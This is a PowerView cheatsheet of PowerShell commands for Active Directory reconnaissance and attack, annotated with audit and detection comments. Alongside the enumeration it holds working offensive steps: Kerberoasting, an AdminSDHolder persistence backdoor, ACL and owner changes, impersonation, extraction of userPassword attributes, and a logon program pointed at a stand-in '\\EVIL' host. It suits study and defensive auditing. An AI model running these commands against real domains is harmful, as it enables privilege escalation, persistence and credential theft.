
PowerView Cheatsheet

Introduction

  • Latest version: Always use the dev branch of PowerSploit https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
  • Naming convention:
  • Get-*: Retrieve raw data
  • Find-*: Locate specific entries
  • Add/Set-*: Modify objects
  • Invoke-*: Catch-all actions
  • Suffixes: Domain* (LDAP/.NET), WMI* (WMI), Net* (Win32 API)

User Enumeration

Basic User Queries

# Get all groups a user belongs to (recursive)
# <User/Group> is a placeholder for the identity being looked up.
Get-DomainGroup -MemberIdentity <User/Group>

# Get effective members of a group (recursive)
# -Recurse expands nested groups so the result is the effective membership.
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Use alternate credentials
# NOTE: 'Password!' is a literal in the script; anyone who can read the script,
# a transcript, or a command history sees it. Prefer Read-Host -AsSecureString
# or a credential already held by the session.
$SecPassword = ConvertTo-SecureString 'Password!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword)
# Read-only query (Get-*) performed under the alternate credential.
Get-DomainUser -Credential $Cred

Filtered User Searches

# Users with passwords changed >1 year ago
# ToFileTime() yields the FILETIME representation that pwdlastset uses, so the
# LDAP <= comparison works on the raw attribute value.
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset

# Enabled/disabled users
# 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule; 2 is the
# ACCOUNTDISABLE bit of userAccountControl, negated with ! to keep enabled accounts.
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"  # Enabled
# Same bit, expressed through PowerView's -UACFilter instead of a raw filter.
Get-DomainUser -UACFilter ACCOUNTDISABLE  # Disabled

# Smartcard authentication
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED  # No smartcard

# Multiple identity types
# The pipeline accepts a mix of SID, distinguished name, GUID and samaccountname
# in one call; 'SID' and 'GUID' here are placeholders for real values.
'SID','CN=dfm,CN=Users,DC=testlab,DC=local','GUID','admin' | Get-DomainUser -Properties samaccountname,lastlogoff

# Service accounts (SPNs)
# -SPN restricts the result to users with a servicePrincipalName set.
Get-DomainUser -SPN

# Kerberos pre-auth not required
# Two equivalent spellings of the same userAccountControl flag; accounts with
# DONT_REQ_PREAUTH set are worth auditing because the flag weakens Kerberos.
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH

Advanced User Searches

# Service accounts in "Domain Admins"
# ? is the Where-Object alias; the -match is a substring/regex test on the
# memberof DNs, so it also matches any group whose DN contains 'Domain Admins'.
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}

# Users with sidHistory
# Any populated sidHistory is a review item: the attribute carries SIDs from
# another domain that still grant access.
Get-DomainUser -LDAPFilter '(sidHistory=*)'

# Constrained delegation
# -TrustedToAuth selects accounts with TRUSTED_TO_AUTH_FOR_DELEGATION set.
Get-DomainUser -TrustedToAuth

# Find machine accounts in privileged groups
# -AdminCount selects groups with adminCount=1 (AdminSDHolder-protected);
# machine account samaccountnames end in '$', hence the '*$' wildcard.
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}

Computer Enumeration

# Unconstrained delegation computers
# Hosts with TRUSTED_FOR_DELEGATION; a high-value audit item because such a
# host can reuse any TGT it receives.
Get-DomainComputer -Unconstrained

# Find computers in specific OU
# "ldap://OU=..." is a placeholder; supply the full OU distinguished name.
Get-DomainComputer -SearchBase "ldap://OU=..."

# Find computers with 'outlier' properties
# -FindOne returns a single computer object that serves as the reference;
# presumably Find-DomainObjectPropertyOutlier compares other objects' property
# sets against it -- confirm against the PowerView help before relying on it.
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier

GPO Enumeration

# Get GPOs applied to a machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local

# Map GPOs to computers/users
# <User/Group> and <USER> are placeholders for the identity being mapped.
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -LocalGroup RDP  # RDP access

# Export GPO mappings
# % is the ForEach-Object alias. The computers property is an array, so it is
# joined into one string first; otherwise Export-CSV would write the type name
# instead of the values.
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv

# Get domain controller policy
# PrivilegeRights lists the user-rights assignments (e.g. who may log on) from
# the Default Domain Controllers Policy.
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights

# Get domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
# KerberosPolicy holds the ticket lifetime settings.
$DomainPolicy.KerberosPolicy  # Golden ticket info
# SystemAccess holds the password/lockout policy values.
$DomainPolicy.SystemAccess     # Password settings

ACL Management

# Enumerate ACLs for an object
# Read-only. -ResolveGUIDs turns schema/extended-right GUIDs into names so the
# ObjectType field is human readable.
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

# Grant password reset rights
# Add-* modifies the directory: this writes an ACE on matt's object allowing
# will to reset the password. Such a change is visible in the object's ACL.
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword

# Audit AdminSDHolder ACLs
# Read-only. AdminSDHolder's ACL is what SDProp stamps onto every protected
# (adminCount=1) object, so unexpected ACEs here are a high-severity finding.
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

# Backdoor via AdminSDHolder
# Add-* modifies the directory: grants matt full rights on AdminSDHolder, which
# SDProp then propagates to all protected objects. The audit query above is how
# to detect this.
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

# DCsync rights
# Read-only. After -ResolveGUIDs the replication extended rights appear as
# 'DS-Replication-Get-Changes*' in ObjectType, hence the 'replication-get'
# match; GenericAll on the domain head implies them as well.
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    $_.ObjectType -match 'replication-get' -or $_.ActiveDirectoryRights -match 'GenericAll'
}

# Change object owner
# Set-* modifies the directory: ownership of dfm's object passes to harmj0y.
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

Delegation

# Unconstrained delegation + logged-on users
# Both variables are assigned but not consumed in this snippet; they are the
# inputs a caller would combine. -AllowDelegation selects accounts that are
# not marked NOT_DELEGATED.
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount

# Find logged-on users on unconstrained servers
# -ShowAll returns every session found rather than only matches.
Find-DomainUserLocation -ComputerUnconstrained -ShowAll

# Hunt admin users on unconstrained servers
# Narrows the sessions to adminCount=1 users whose TGTs can be delegated;
# a session like this on an unconstrained host is the exposure to remediate.
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

Kerberoasting

# Kerberoast users in specific OU
# -SearchBase limits the SPN lookup to the given OU. Service-ticket requests
# made here show up as Kerberos event 4769 on the KDC.
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"

Local Group Enumeration

# Get local groups on remote server
# Net* cmdlets use the Win32 API (see naming convention above).
Get-NetLocalGroup SERVER.domain.local

# Get local group members (API method)
# -Method API selects the Win32 API path rather than the WinNT provider.
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local

Forest Global Catalog

# Enumerate global catalogs
Get-ForestGlobalCatalog

# Resolve short names to FQDNs
# gc is the Get-Content alias and % is ForEach-Object; computers.txt holds one
# short name per line. -LDAP is accepted as an unambiguous prefix of
# -LDAPFilter via PowerShell parameter-name matching.
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}

File Finding

# Find interesting files with alternate credentials
# NOTE: "PASSWORD" is a literal in the script and will appear in transcripts and
# history; prefer Read-Host -AsSecureString or an existing credential object.
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
# Share enumeration generates SMB connections to each host; expect it to be
# noisy in network and file-access logs.
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential

Object Manipulation

# Set object property
# Set-* modifies the directory: writes mstsinitialprogram on testuser. Attribute
# writes of this kind appear in directory-change auditing (event 5136) when
# object-level auditing is enabled.
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'}

# Save/load PowerView objects
# user.xml contains every property Get-DomainUser returned, so handle the file
# with the same care as the directory data itself.
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml

Impersonation

# Impersonate user
# NOTE: 'Password123!' is a literal in the script and will appear in transcripts
# and history; prefer Read-Host -AsSecureString.
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
# Subsequent cmdlets run as TESTLAB\dfm.a until Invoke-RevertToSelf is called;
# the scope (thread vs. process) is not shown here -- check the PowerView help.
Invoke-UserImpersonation -Credential $Cred

# Revert to self
# Always pair with the impersonation above so later commands run as the original user.
Invoke-RevertToSelf

Miscellaneous

# Foreign users in domain local groups
# Queries the global catalog for foreignSecurityPrincipal objects and keeps
# those whose SID has a RID of at least 100 (the regex excludes well-known
# low RIDs such as S-1-5-11 Authenticated Users).
$ForeignUsers = Get-DomainObject -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'}
# ...process memberships...

# Check for user passwords
# userPassword is returned as a byte array; it is decoded as ASCII and attached
# as a 'Password' note property. Any account that matches is a finding: a
# populated userPassword attribute means a credential is readable via LDAP.
# fl is the Format-List alias.
Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {
    Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru
} | fl

Tip: Set $FormatEnumerationLimit=-1 to avoid truncating large output.


References